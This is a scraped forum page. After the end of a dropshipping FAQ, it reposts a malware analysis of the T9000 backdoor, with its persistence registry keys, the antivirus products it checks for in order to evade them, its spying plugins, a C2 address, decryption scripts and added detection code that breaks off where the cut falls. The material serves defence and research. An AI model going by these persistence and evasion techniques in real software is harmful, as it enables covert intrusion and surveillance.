8) What do I do if someone asks me for contact details?! Did you grow up in a cave? Or, well, maybe you are mute, then I understand you; if none of these apply, you go nicely to Skype, buy a phone number from them, redirect it to your own phone number and talk to people.

9) What do I do if I don't know English?! Pass!

10) How much profit do you make and how fast did you start earning money? I make enough, otherwise I wouldn't bother with the business and wouldn't set up a company for these things. How fast? From the first day, because I already had a few social media accounts set up for these things.

11) Can you give me a link to your sites and/or your pages?! NO.

These are the most common questions I get; dropshipping is in everyone's sight, it is no secret, you can all do it, so stop saying that money can't be made on the internet! As a good friend of mine used to say: "Real money on the internet is made from intermediating services....that guy has the product, you sell it, period." All the best and good luck making money!
    2 points
  5. T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques

Posted by: Josh Grunzweig and Jen Miller-Osborn on February 4, 2016 1:00 PM
Filed in: Malware, Threat Prevention, Unit 42
Tagged: Skype, T5000, T9000, Trojans

Most custom backdoors used by advanced attackers have limited functionality. They evade detection by keeping their code simple and flying under the radar. But during a recent investigation we found a backdoor that takes a very different approach. We refer to this backdoor as T9000, which is a newer variant of the T5000 malware family, also known as Plat1. In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users. The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed. It uses a multi-stage installation process with specific checks at each point to identify if it is undergoing analysis by a security researcher.

The primary functionality of this tool is to gather information about the victim. In fact, the author chose to store critical files dropped by the Trojan in a directory named "Intel." T9000 is pre-configured to automatically capture data about the infected system and steal files of specific types stored on removable media. We have observed T9000 used in multiple targeted attacks against organizations based in the United States. However, the malware's functionality indicates that the tool is intended for use against a broad range of users.

In this report, we share an analysis of each stage in T9000's execution flow. Stay tuned for a future report in which we will provide more detail on how this tool has been used and the infrastructure we have identified as part of our analysis.
T9000 Backdoor Analysis

The entire execution flow of the malware is represented in the following diagram:

As this malware uses a multistage execution flow, we'll discuss each stage individually.

Initial Exploitation

The sample of T9000 used in this analysis was originally dropped via a RTF file that contained exploits for both CVE-2012-1856 and CVE-2015-1641. When triggered, an initial shellcode stage is run, which is responsible for locating and executing a secondary shellcode stub. The second stage shellcode reads the initial RTF document and seeks to the end of the file, using the last four bytes as the size of the embedded payload. With the payload size confirmed, the shellcode will create a file in the %TEMP% folder using a temporary filename. The shellcode will decrypt and subsequently load the embedded payload in the RTF file. The decrypted payload is written to the temporary file and executed using WinExec. The shellcode then attempts to decrypt an embedded decoy document with the same algorithm used to decrypt the payload, which it will save to the %TEMP%\~tmp.doc path. This file is opened using the following command:

cmd /C %TEMP%\~tmp.doc

However, this particular sample did not contain a decoy document.

Stage 1

When this temporary file is initially executed, it will begin by creating the following mutex to ensure only one instance of the malware is running at a given time:

820C90CxxA1B084495866C6D95B2595xx1C3

It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\Software\ registry path:

Sophos, INCAInternet, DoctorWeb, Baidu, Comodo, TrustPortAntivirus, GData, AVG, BitDefender, VirusChaser, McAfee, Panda, Trend Micro, Kingsoft, Norton, Micropoint, Filseclab, AhnLab, JiangMin, Tencent, Avira, Kaspersky, Rising, 360

These security products are represented by a value that is binary AND-ed with any other products found.
The following numbers represent each respective security product.

0x08000000 : Sophos
0x02000000 : INCAInternet
0x04000000 : DoctorWeb
0x00200000 : Baidu
0x00100000 : Comodo
0x00080000 : TrustPortAntivirus
0x00040000 : GData
0x00020000 : AVG
0x00010000 : BitDefender
0x00008000 : VirusChaser
0x00002000 : McAfee
0x00001000 : Panda
0x00000800 : Trend Micro
0x00000400 : Kingsoft
0x00000200 : Norton
0x00000100 : Micropoint
0x00000080 : Filseclab
0x00000040 : AhnLab
0x00000020 : JiangMin
0x00000010 : Tencent
0x00000004 : Avira
0x00000008 : Kaspersky
0x00000002 : Rising
0x00000001 : 360

So, for example, if both Trend Micro and Sophos were discovered on a victim machine, the resulting value would be 0x08000800. This numerical value is written to the following file:

%APPDATA%\Intel\avinfo

The malware proceeds to drop the following files to the %APPDATA%\Intel directory. Additionally, the following two files are written to the Data directory. The following table provides a description of each file dropped:

File Name - Description
~1 - Debug information about files used by malware.
avinfo - Installed security products on victim.
hccutils.dll - Malicious DLL. Loads ResN32.dll.
hccutils.inf - Malicious INF file. Points to hccutils.dll.
hjwe.dat - Encrypted core of malware family.
igfxtray.exe - Legitimate Microsoft executable. Loads hccutils.dll.
qhnj.dat - Encrypted plugin. Hooks a number of functions and logs results.
QQMgr.dll - Malicious DLL. Sets persistence via Run registry key.
QQMgr.inf - Malicious INF file. Points to QQMgr.dll
ResN32.dat - String pointing to path of encrypted core of malware.
ResN32.dll - Malicious DLL. Decrypts, decompresses, and loads core malware.
tyeu.dat - Encrypted plugin. Takes screenshots and collects Skype information.
vnkd.dat - Encrypted plugin. Finds files on removable drives on victim machine.
dtl.dat - Encrypted configuration information.
glp.uin - Plugin configuration information.
You'll notice that QQMgr* files are not listed in the original malware execution flow diagram. In the event the victim is running any of the following operating system versions, as well as either Kingsoft, Filseclab, or Tencent security products, the malware will be installed using an alternative method.

Windows 2008 R2
Windows 7
Windows 2012
Windows 8

In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of 'QQMgr.inf'. Otherwise, it will use 'hccutils.inf' as an argument. QQMgr.inf will install the QQMgr.dll, while hccutils.inf will install the hccutils.dll library. QQMgr.dll will set the following registry key:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll

The QQMgr.dll file has the following debug string found within it:

H:\WORK\PROJECT\InfInstallBypassUAC\Release\BypassUAC.pdb

The hccutils.dll file is described later within this post. After the malware drops the required files, by default the malware will spawn %APPDATA%\Intel\igfxtray.exe in a new process, which begins the second stage of the malware's execution.

Stage 2

The igfxtray.exe is a legitimate Microsoft Windows executable that sideloads the malicious hccutils.dll DLL file. This DLL has the following debug string embedded within it:

D:\WORK\T9000\hccutils_M4\Release\hccutils.pdb

Upon loading this malicious DLL, the malware will initially perform the same queries for security products that were witnessed in stage 1. Three separate techniques for starting stage 3 are used depending on the properties of the victim.
The first technique is used if the victim meets the following criteria:

Microsoft Windows 8 / Windows Server 2012 R2
DoctorWeb security product installed

For this situation, the following registry key is set:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run

This ensures that the ResN32.dll library will be run using the 'Run' exported function whenever the machine is rebooted.

The second technique is used if the victim meets any of the following sets of criteria:

Microsoft Windows 8 / Windows Server 2012 R2, and not running Kingsoft, Tencent, or DoctorWeb security products

Microsoft Windows XP or lower, with no security products installed, or running any of the following: Sophos, GData, TrendMicro, AhnLab, Kaspersky

In these situations, the following persistence technique is used.

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1

Setting these registry keys both enables the AppInit_DLL functionality, and ensures that every user mode process that is spawned will load the ResN32.dll library. More information about this can be found here.

The third technique is used in any other situation. When this occurs, the malware will first identify the explorer.exe process identifier. It proceeds to inject the ResN32.dll library into this process. At this point, the third stage of the malware family is loaded.

Stage 3

The third stage begins when the ResN32.dll file begins operating. This file contains the following debug string:

D:\WORK\T9000\ResN_M2\Release\ResN32.pdb

The ResN32.dll library begins by spawning a new thread that is responsible for the majority of the capabilities built into this sample. This thread begins by checking the operating system version, and once again runs a query on the various security products installed on the victim machine.
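As an added triage helper (not part of the Unit 42 report), the following Python decodes an avinfo value into product names and then maps the products plus the OS to the stage 1 installation route and the stage 2 persistence technique described above, so an analyst knows which artifacts to check on a host. The three OS buckets and all function names are assumptions of this example; "TrendMicro" in the stage 2 list is treated as the same product as "Trend Micro" in the bit table.

```python
# Added triage helper, not part of the Unit 42 report: decodes the avinfo
# bitmask and maps (products, OS) to the install and persistence path the
# report describes for stage 1 and stage 2, so an analyst knows which
# artifacts (INF install, Run key, AppInit_DLLs, explorer.exe injection)
# to look for on a given host.
from typing import Dict, List

# Bit value per security product, as listed in the report.
AV_BITS = {
    0x08000000: "Sophos", 0x02000000: "INCAInternet", 0x04000000: "DoctorWeb",
    0x00200000: "Baidu", 0x00100000: "Comodo", 0x00080000: "TrustPortAntivirus",
    0x00040000: "GData", 0x00020000: "AVG", 0x00010000: "BitDefender",
    0x00008000: "VirusChaser", 0x00002000: "McAfee", 0x00001000: "Panda",
    0x00000800: "Trend Micro", 0x00000400: "Kingsoft", 0x00000200: "Norton",
    0x00000100: "Micropoint", 0x00000080: "Filseclab", 0x00000040: "AhnLab",
    0x00000020: "JiangMin", 0x00000010: "Tencent", 0x00000004: "Avira",
    0x00000008: "Kaspersky", 0x00000002: "Rising", 0x00000001: "360",
}

# OS buckets are an assumption of this helper: the report names specific
# Windows versions, collapsed here into the three groups its branches use.
XP_OR_LOWER = "xp_or_lower"   # Windows XP or lower
WIN7_2008R2 = "win7_2008r2"   # Windows 7 / Server 2008 R2
WIN8_2012 = "win8_2012"       # Windows 8 / Server 2012 (R2)


def decode_avinfo(value: int) -> List[str]:
    """Return the product names whose bits are set in an avinfo value,
    e.g. 0x08000800 -> ['Sophos', 'Trend Micro']. Bits outside the known
    table are reported rather than silently dropped."""
    names = [name for bit, name in AV_BITS.items() if value & bit]
    unknown = value & ~sum(AV_BITS)
    if unknown:
        names.append("unknown bits 0x%08x" % unknown)
    return sorted(names)


def stage1_install(products: List[str], os_bucket: str) -> str:
    """Stage 1: on 2008 R2 / 7 / 2012 / 8 with Kingsoft, Filseclab or
    Tencent present, the INF route via InfDefaultInstall.exe is used
    (QQMgr.inf when Tencent is present, else hccutils.inf); otherwise
    igfxtray.exe is spawned and sideloads hccutils.dll."""
    p = set(products)
    if os_bucket in (WIN7_2008R2, WIN8_2012) and p & {"Kingsoft", "Filseclab", "Tencent"}:
        if "Tencent" in p:
            return "InfDefaultInstall.exe QQMgr.inf (sets Run\\Eupdate)"
        return "InfDefaultInstall.exe hccutils.inf"
    return "igfxtray.exe sideloads hccutils.dll"


def stage2_persistence(products: List[str], os_bucket: str) -> str:
    """Stage 2: choose between the three techniques the report lists."""
    p = set(products)
    # Technique 1: Windows 8 / Server 2012 R2 with DoctorWeb -> Run\update key.
    if os_bucket == WIN8_2012 and "DoctorWeb" in p:
        return "Run\\update (rundll32.exe ResN32.dll Run)"
    # Technique 2a: Windows 8 / 2012 R2 without Kingsoft, Tencent or DoctorWeb.
    if os_bucket == WIN8_2012 and not p & {"Kingsoft", "Tencent", "DoctorWeb"}:
        return "AppInit_DLLs"
    # Technique 2b: XP or lower with no products, or one of the listed ones.
    listed = {"Sophos", "GData", "Trend Micro", "AhnLab", "Kaspersky"}
    if os_bucket == XP_OR_LOWER and (not p or p & listed):
        return "AppInit_DLLs"
    # Technique 3: everything else.
    return "inject ResN32.dll into explorer.exe"


def triage(avinfo_value: int, os_bucket: str) -> Dict[str, object]:
    """Combine the three lookups for one host."""
    products = decode_avinfo(avinfo_value)
    return {
        "products": products,
        "stage1": stage1_install(products, os_bucket),
        "stage2": stage2_persistence(products, os_bucket),
    }


if __name__ == "__main__":
    # Constructed sample: the report's own example value, on a Windows 7 host.
    print(triage(0x08000800, WIN7_2008R2))
```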
Under certain conditions, the following registry key is set, ensuring persistence across reboots:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run

Following this, a new thread is created that is responsible for deleting previously written files. This thread creates the following mutex:

Global\\deletethread

It proceeds to attempt to delete the following files in an infinite loop until said files have been deleted:

%STARTUP%\hccutils.dll
%STARTUP%\hccutil.dll
%STARTUP%\igfxtray.exe

The ResN32.dll malware proceeds to read in the ResN32.dat file that was previously written to disk. This file contains a path to the hjwe.dat file, which is subsequently read in. The data within the hjwe.dat file is decrypted using the RC4 algorithm, and subsequently decompressed using the LZMA algorithm. The following script can be used to decrypt the hjwe.dat file, along with the plugins that will be discussed later.

    import sys
    from struct import unpack

    import pylzma  # third-party package; the original script also relies on it


    def rc4(data, key):
        # Standard RC4: key scheduling over the 260-byte key, then the
        # pseudo-random generation loop XORed over the payload bytes.
        S = list(range(256))
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % len(key)]) % 256
            S[i], S[j] = S[j], S[i]
        i = j = 0
        out = bytearray()
        for byte in data:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(byte ^ S[(S[i] + S[j]) % 256])
        return bytes(out)


    with open(sys.argv[1], 'rb') as f:
        fd = f.read()

    # 16-byte header: magic, unknown, payload length, unknown.
    bytes_0_4, bytes_4_8, bytes_8_12, bytes_12_16 = unpack("<IIII", fd[0:16])
    if bytes_0_4 == 0xf7e4aa65:
        length = bytes_8_12
        if len(fd) - 16 != length:
            print("[*] Possible error reading in length of data.")

    # A 260-byte RC4 key follows the header; the encrypted, LZMA-compressed
    # payload follows the key.
    key_size = 260
    key = fd[16:16 + key_size]
    data = fd[16 + key_size:]
    decrypted = rc4(data, key)
    decompressed = pylzma.decompress_compat(decrypted)

    out_name = sys.argv[1] + ".decompressed"
    with open(out_name, 'wb') as f1:
        f1.write(decompressed)
    print("[+] Wrote %s" % out_name)

After this file has been decrypted and decompressed, it is written to a file in the %TEMP% directory with a file prefix of '____RES'. This file, which contains a Windows DLL, is then loaded into the current process. After the malicious library has been loaded, the previously written temporary file is deleted. This begins the last stage of the malware, which will load the core of the malware family.

Stage 4

Once the decrypted and decompressed hjwe.dat file is loaded, it begins by checking its parent process against the following list. If the parent process matches the following blacklist, the malicious DLL will exit without performing any malicious activities.

winlogon.exe
csrss.exe
logonui.exe
ctfmon.exe
drwtsn32.exe
logonui.exe
explore.exe
System
Dbgview.exe
userinit.exe
lsass.exe
wmiprvse.exe
services.exe
inetinfo.exe
avp.exe
Rtvscan.exe

The malware proceeds to collect the username of the victim, as well as the operating system version. It then compares its parent process against the following list of executables:

winlogon.exe
csrss.exe
logonui.exe
ctfmon.exe
drwtsn32.exe
logonui.exe
System
Dwm.exe
QQPCRTP.exe
Tasking.exe
Taskhost.exe
Taskmgr.exe
Dbgview.exe
suerinit.exe
lsass.exe
wmiprvse.exe
services.exe
inetinfo.exe
avp.exe
Rtvscan.exe

Notice the repeated check for 'logonui.exe', as well as the overlap with the previous parent executable check, which implies sloppiness by the malware author. After these checks are performed, the following mutex is created.

Global\\{A59CF429-D0DD-4207-88A1-04090680F714}

The following folders are then created:

utd_CE31
XOLOADER
Update

The path of these folders is determined by the version of Microsoft Windows running.
The following possibilities exist:

%ALLUSERSPROFILE%\Documents\My Document\
%PUBLIC%\Downloads\Update\

At this point, the malware will read in the dtl.dat file, which contains configuration data. Data contained within this file starting at offset 0x20 is xor-encrypted using a single-byte key of 0x5F. The following script can be used to extract the IP address and port for the C2 server from this file.

    import socket
    import sys
    from struct import pack, unpack


    def int2ip(addr):
        # Convert a big-endian 32-bit integer into dotted-quad notation.
        return socket.inet_ntoa(pack("!I", addr))


    config_file = sys.argv[1]
    with open(config_file, 'rb') as f:
        fd = f.read()

    # Everything from offset 0x20 onward is XORed with the single byte 0x5F.
    decrypted = bytes(x ^ 0x5f for x in fd[32:])
    port = unpack("<I", decrypted[4:8])[0]
    ip = int2ip(unpack(">I", decrypted[8:12])[0])
    print("IP Address : %s" % ip)
    print("Port : %d" % port)

The malware will then read in and parse the included plugin configuration information, which is found within the glp.uin file that was previously dropped. These included plugins are encrypted and compressed using the same method witnessed for the hjwe.dat file previously. The previously included script can be used to decrypt and decompress the following three plugin files:

tyeu.dat
vnkd.dat
qhnj.dat

These three plugins are subsequently loaded after being decrypted and decompressed. An overview of these plugins can be found later in this post. The malware proceeds to create the following event:

Global\\{34748A26-4EAD-4331-B039-673612E8A5FC}

Additionally, the following three mutexes are created:

Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9}

The malware will spawn a new thread to handle network communication. The following event is created prior to this communication occurring:

Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E}

The malware includes proxy support in the event that the victim is behind a web proxy.
Network traffic occurs over a binary protocol on the port specified within the configuration. Traffic is xor-encrypted with a single-byte key of 0x55 in an attempt to bypass any network security products that may be in place. Once decrypted, the following traffic is sent by the malware.

Figure 1: Decrypted data sent by malware

As we can see from the above image, the malware will send out an initial beacon, followed by various collected information from the victim machine. The following information is exfiltrated:

Installed security products
System time
Build Number
CPU Architecture (32-bit/64-bit)
MAC Address
IP Address
Hostname
Username
Parent executable name
Plugin configuration information

The malware is configured to receive a number of commands. The following command functionalities have been identified.

Command - Description
DIR - Directory listing
LIR - Drive listing
RUN - Execute command (either interactively or not)
CIT - Send command to interactively spawned command
CFI - Kill interactively spawned process
DOW - Download file
UPL - Upload file
DEL - Delete file
DTK - Retrieve statistics for file
ERR - Null command

Additionally, the following commands have been identified, however, their functionalities have yet to be fully discovered.

PNG, PLI, PLD, FDL, OSC, OSF, SDA, QDA, TFD, SDS, SCP, FMT, STK, CRP

Plugin #1 – tyeu.dat

When this plugin is called with the default exported function, it will create the following mutex:

{CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62}

When called with the SetCallbackInterface function export, the malicious capabilities of the plugin begin. The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin's thread. The plugin proceeds to create the following named event:

Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E}

Multiple threads are then spawned to handle various actions.
The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files:

%PUBLIC%\Downloads\Update\S[random].dat
%ALLUSERSPROFILE%\Documents\My Document\S[random].dat

The random data is generated via the current system time. Additionally, when a screenshot is written, one of the following log files has data appended to it:

%PUBLIC%\Downloads\Update\Log.txt
%ALLUSERSPROFILE%\Documents\My Document\Log.txt

Figure 2: Example data found within Log.txt file

A second thread is responsible for monitoring the foreground window every 20 seconds. The thread will target the window names set within the plugin configuration. In this particular instance, the malware will target the 'notepad' process. When this process is discovered to be running in the foreground window, the malware will take a screenshot of this window. The data is compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files:

%PUBLIC%\Downloads\Update\W[random].dat
%ALLUSERSPROFILE%\Documents\My Document\W[random].dat

Like the previous thread, this one attempts to write another log file to the disk. However, due to a bug within the code of this plugin, the malware author attempts to append the 'C:\\Windows\\Temp\\Log.txt' string to the path, resulting in an inaccessible file path. In the event this bug did not exist, the following example data would be written:

08:37:49 2000 [4] PrintKeyTitleWnd: ===>> Process ID : 2000

The third and final thread spawned by this plugin is responsible for collecting information from the Skype program. The malware will use the built-in Skype API to accomplish this. This only takes place if both Skype is running and the victim is logged into Skype.
It makes calls to the following functions:

SkypeControlAPIDiscover
SkypeControlAPIAttach

When hooking into the Skype API, the victim is presented with the following dialog:

Figure 3: Skype API access request

The victim must explicitly allow the malware to access Skype for this particular functionality to work. However, since a legitimate process is requesting access, the user may find him- or herself allowing this access without realizing what is actually happening. Once enabled, the malware will record video calls, audio calls, and chat messages. Audio and video files are stored in the following folder:

%APPDATA%\Intel\Skype

Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are stored in randomly named .dat files within the Skype folder. When decrypted, we can see that the malware periodically takes images of the video calls. Audio calls are stored as .wav files.

Figure 4: A lonely malware reverser is captured on video by the malicious plugin

The original name for this plugin is 'CaptureDLL.dll'. This is aptly named, as we see that this plugin has the following functionality:

Capture full desktop screenshots
Capture window screenshots of targeted processes
Capture Skype audio, video, and chat messages

Plugin #2 – vnkd.dat

The vnkd.dat plugin has the following debug path, leading us to believe that the original name for this plugin is 'FlashDiskThief':

e:\WORK\Project\T9000\Windows\Target\FlashDiskThief.pdb

When loaded with the default DllEntryPoint exported function, it will create the following mutex:

Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4}

Like the other plugins associated with this malware, the majority of the functionality for this malware resides within the SetCallbackInterface exported function.
This function spawns a new thread that begins by registering a new window with a class name and window name of 'xx'. The plugin proceeds to iterate through all connected drives on the system, looking for removable drives.

Figure 5: Plugin check for removable drives

Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin's configured list. In this particular instance, the malware will seek out the following file types:

*.doc
*.ppt
*.xls
*.docx
*.pptx
*.xlsx

If one of these file types is found, the malware will create a copy of the file in one of the following paths:

%PUBLIC%\Downloads\Update\D[random].tmp
%ALLUSERSPROFILE%\Documents\My Document\D[random].tmp

The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below.

Figure 6: File structure prior to decryption

Figure 7: File structure post decryption

This concludes the functionality of the vnkd.dat plugin, or FlaskDiskThief as it's known by the malware's author. While specific in nature, this plugin allows attackers to collect files being passed around from one machine to another via removable drives.

Plugin #3 – qhnj.dat

This particular plugin appears to have an original filename of 'kplugin.dll' due to debugging information found within the file. The qhnj.dat plugin is responsible for hooking a number of common Microsoft Windows API calls, and logging the results. The following functions are hooked by this plugin:

ImmGetCompositionStringA
ImmGetCompositionStringW
CreateFileW
DeleteFileW
CopyFileExW
MoveFileWithProgressW
CreateDirectoryW
CreateDirectoryExW
RemoveDirectoryW
GetClipboardData
CryptEncrypt
CryptDecrypt

The plugin is most likely hooking the ImmGetCompositionString* functions in order to collect information about Unicode characters on the victim machine, such as Chinese, Japanese, and Korean.
Hooking the various file and directory operations allows the malware to log what file changes are occurring on the system. When a file is created, copied, moved, or deleted on the system, the malware will check the directory of said file against the following blacklist:

\\\\.\\
:\\program files\\
\\AppData\\
\\temporary internet files\\
\\application data\\
\\Local Settings\\
\\cookies\\
\\temp\\
\\history\\

Additionally, the filename is compared against the '.tmp' extension to ensure a temporary file is ignored. Should the file meet the required criteria, this data is logged. Additionally, all folder modifications and clipboard data are logged as well.

The Crypt* functions allow the malware to collect sensitive encrypted data sent to and from the victim machine. This is especially useful when viewing network traffic, allowing the attackers to potentially gain access to remote systems used by the victim.

All of the data logged by the qhnj.dat plugin file is stored in one of the following file paths. Data is encrypted using a single-byte XOR key of 0x79.

%PUBLIC%\Downloads\Update\uai[random].tmp
%ALLUSERSPROFILE%\Documents\My Document\uai[random].tmp

This last plugin allows the attackers to record important actions taken by the victim, which in turn may allow them to gain additional access as well as insight into the victim's actions.

Conclusion

T9000 appears to be the latest version of this Trojan, which has been partially exposed in previous reports. In 2013, Cylance published a report on a group they named "Grand Theft Auto Panda", which includes some details on the T5000 version of this Trojan. FireEye researchers also noted that the malware was used in an attack in 2014 using a lure related to the disappearance of Malaysian flight MH370. The author of this backdoor has gone to great lengths to avoid being detected and to evade the scrutiny of the malware analysis community.
We hope that sharing the details of how this tool works as well as the indicators in the section below will help others defend themselves against attacks using this tool. In a future report, we will detail the infrastructure used by the variants of the malware we have identified and discuss the methods attackers use to infect systems with it.

Palo Alto Networks customers are protected from T9000/T5000 attacks through our next-generation security platform, including the following.

Threat Prevention signatures for the software vulnerabilities listed in this report are available to detect the exploit files during delivery.
Traps is capable of preventing exploitation of the vulnerabilities exploited to install T9000.
WildFire classifies all of the malware described in this report as malicious.
Anti-malware signatures for the files listed in this report.
AutoFocus users can identify the malware discussed in this report with the T5000 tag.

Indicators of Compromise

Mutexes

820C90CxxA1B084495866C6D95B2595xx1C3
Global\\deletethread
Global\\{A59CF429-D0DD-4207-88A1-04090680F714}
Global\\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
Global\\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
Global\\{A8859547-C62D-4e8b-A82D-BE1479C684C9}
{CE2100CF-3418-4f9a-9D5D-CC7B58C5AC62}
Global\\{6BB1120C-16E9-4c91-96D5-04B42D1611B4}

Named Events

Global\\{34748A26-4EAD-4331-B039-673612E8A5FC}
Global\\{EED5CA6C-9958-4611-B7A7-1238F2E1B17E}

File Modifications

%TEMP%\~tmp.doc
%APPDATA%\Intel\avinfo
%APPDATA%\Intel\Data\dtl.dat
%APPDATA%\Intel\Data\glp.uin
%APPDATA%\Intel\Data\
%APPDATA%\Intel\~1
%APPDATA%\Intel\hccutils.dll
%APPDATA%\Intel\hccutils.inf
%APPDATA%\Intel\hjwe.dat
%APPDATA%\Intel\igfxtray.exe
%APPDATA%\Intel\qhnj.dat
%APPDATA%\Intel\QQMgr.dll
%APPDATA%\Intel\QQMgr.inf
%APPDATA%\Intel\ResN32.dll
%APPDATA%\Intel\ResN32.dat
%APPDATA%\Intel\tyeu.dat
%APPDATA%\Intel\vnkd.dat
%STARTUP%\hccutils.dll
%STARTUP%\hccutil.dll
%STARTUP%\igfxtray.exe
%ALLUSERSPROFILE%\Documents\My Document\utd_CE31
%ALLUSERSPROFILE%\Documents\My Document\XOLOADER
%ALLUSERSPROFILE%\Documents\My Document\update
%ALLUSERSPROFILE%\Documents\My Document\Log.txt
%PUBLIC%\Downloads\Update\utd_CE31
%PUBLIC%\Downloads\Update\XOLOADER
%PUBLIC%\Downloads\Update\update
%PUBLIC%\Downloads\Update\Log.txt
%APPDATA%\Intel\Skype

Registry Modifications

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – %SYSTEM%\rundll32.exe %APPDATA\Intel\ResN32.dll Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\update – c:\windows\system32\rundll32.exe %APPDATA\Intel\ResN32.dll Run

Command and Control

198.55.120[.]143:8080

Source: http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/
    2 points
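The indicator list above is only useful once it is turned into checks. The script below is an added example, not part of the Palo Alto report or of the post: it embeds a subset of the published indicators (file hashes, the %APPDATA%\Intel staging names, the Run-key and AppInit_DLLs persistence, a mutex and the C2 socket) and runs them over a handful of constructed host events shaped like what a collector such as Sysmon, autoruns or a file-hash sweep would hand you. The events, the user name and the paths are made up; the indicator values are copied from the report.

```python
"""Match host artifacts against the T9000 indicators listed above.

Added example, not code from the Palo Alto report or the forum post.
SAMPLE_EVENTS and the 'lab' user are constructed; indicator values are
copied from the report. Feed scan() the same dict shapes from a real
collector to use it on a host.
"""
import re

# SHA-256 values from the report (subset); compared lower-cased.
T9000_SHA256 = {
    "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f": "QQMgr.dll",
    "1cea4e49bd785378d8beb863bb8eb662042dffd18c85b8c14c74a0367071d9a7": "ResN32.dll",
    "21a5818822a0b2d52a068d1e3339ed4c767f4d83b081bf17b837e9b6e112ee61": "igfxtray.exe",
    "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9": "hccutils.dll",
}
# File names the implant stages under %APPDATA%\Intel (the .dat blobs are
# encrypted per host, so their hashes vary; the path is the stable signal).
STAGED_NAMES = {
    "hccutils.dll", "hccutils.inf", "hjwe.dat", "igfxtray.exe", "qhnj.dat",
    "qqmgr.dll", "qqmgr.inf", "resn32.dll", "resn32.dat", "tyeu.dat", "vnkd.dat",
}
STAGING_DIR = re.compile(r"\\AppData\\Roaming\\Intel\\([^\\]+)$", re.IGNORECASE)
T9000_MUTEXES = {
    r"global\deletethread",
    r"global\{a59cf429-d0dd-4207-88a1-04090680f714}",
    r"global\{3c6fb3ca-69b1-454f-8b2f-bd157762810e}",
}
T9000_C2 = {("198.55.120.143", 8080)}

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
APPINIT_KEY = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows"
RESN32 = re.compile(r"\\Intel\\ResN32\.dll", re.IGNORECASE)


def check_file(ev):
    hits = []
    digest = ev.get("sha256", "").lower()
    if digest in T9000_SHA256:
        hits.append(("known-hash", f"{ev['path']} is {T9000_SHA256[digest]}"))
    m = STAGING_DIR.search(ev["path"])
    if m and m.group(1).lower() in STAGED_NAMES:
        hits.append(("staging-path", ev["path"]))
    return hits


def check_registry(ev):
    hits = []
    key, name, data = ev["key"].lower(), ev["name"].lower(), str(ev.get("data", ""))
    if key == RUN_KEY.lower() and RESN32.search(data):
        hits.append(("run-key", f"{ev['name']} -> {data}"))
    # AppInit_DLLs pointing at ResN32.dll; LoadAppInit_DLLs=0x1 is what makes it load,
    # but on its own that value is not an indicator, so it is not flagged here.
    if key == APPINIT_KEY.lower() and name == "appinit_dlls" and RESN32.search(data):
        hits.append(("appinit-dll", data))
    return hits


def check_mutex(ev):
    return [("mutex", ev["name"])] if ev["name"].lower() in T9000_MUTEXES else []


def check_netconn(ev):
    sock = (ev["dst_ip"], int(ev["dst_port"]))
    return [("c2", f"{sock[0]}:{sock[1]}")] if sock in T9000_C2 else []


CHECKS = {"file": check_file, "registry": check_registry,
          "mutex": check_mutex, "netconn": check_netconn}


def scan(events):
    """Return (rule, detail) findings for every event that matches an indicator."""
    findings = []
    for ev in events:
        findings.extend(CHECKS.get(ev["type"], lambda _: [])(ev))
    return findings


# Constructed sample events (not real telemetry) covering each check.
APPDATA = r"C:\Users\lab\AppData\Roaming"
SAMPLE_EVENTS = [
    {"type": "file", "path": APPDATA + r"\Intel\ResN32.dll",
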